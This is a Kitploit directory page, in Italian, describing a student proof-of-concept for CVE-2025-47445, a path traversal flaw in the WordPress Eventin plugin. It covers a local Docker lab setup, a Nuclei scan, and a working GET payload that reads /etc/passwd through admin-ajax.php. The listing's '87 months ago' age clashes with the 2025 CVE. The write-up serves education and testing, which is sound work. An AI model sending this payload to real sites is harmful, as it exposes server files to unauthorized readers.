Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-47445-PoC — Exploit proof-of-concept per CVE-2025-47445, una vulnerabilità di path traversal nel plugin WordPress Eventin. Include istruzioni di configurazione per un ambiente Docker locale e passaggi di sfruttamento manuale. | Kitploit
Strumenti/GitHubGitHub/inverterad/cve-2025-47445-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubinverterad/cve-2025-47445-poc

CVE-2025-47445-PoC

Exploit proof-of-concept per CVE-2025-47445, una vulnerabilità di path traversal nel plugin WordPress Eventin. Include istruzioni di configurazione per un ambiente Docker locale e passaggi di sfruttamento manuale.

Vedi Repository
87 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-47445 PoC

Questa prova di concetto si basa su un compito scolastico in cui volevamo trovare un plugin wordpress vulnerabile e testare tale vulnerabilità in un ambiente locale controllato.

Info
Plugin WordPress:Wordpress Eventin
Versione plugin:4.0.26 (o precedenti)
Informazioni CVE:Project Discovery - Vulnerability library
CVEdetails.com
Strumenti di interesse:Wordfence Lab Environment
Docker
Burp Suite
Nuclei

Configurazione dell'ambiente

Worfence Docker WordPress Research Lab viene fornito con due ambienti diversi, uno con una versione PHP più vecchia. Noi opteremo per quello più recente.

root@kitploit:~
# In the dockerwp84 folder
docker-compose build
docker-compose up -d

Dopodiché ho configurato la pagina WordPress tramite localhost:1337. Ho scaricato il plugin Eventin, specificamente la versione 4.0.26 dallo store dei plugin e l'ho installato e attivato tramite l'interfaccia di WordPress.

Ora tutto dovrebbe essere pronto.

DAST / Nuclei

Voglio vedere se Nuclei riesce a trovare la CVE che cerco, quindi eseguo un'istanza tramite un contenitore Docker temporaneo.

root@kitploit:~
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337

Ho provato a eseguire Nuclei diverse volte e ho ottenuto risultati diversi, non so il perché. Ma alla fine trova la CVE, e un paio di altre cose che non stavo cercando specificamente.

Nuclei screenshot

Burp / Test manuale

Per vedere se posso accedere al file /etc/passwd, inserisco semplicemente il seguente payload nella mia richiesta GET.

root@kitploit:~
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd

Ed è stato un successo.

Burp screenshot

Conclusioni

Questo è stato fatto per scopi educativi.

Assicurati di aggiornare tutto il tuo software. Nuove CVE vengono scoperte ogni giorno.

Scarica lo strumento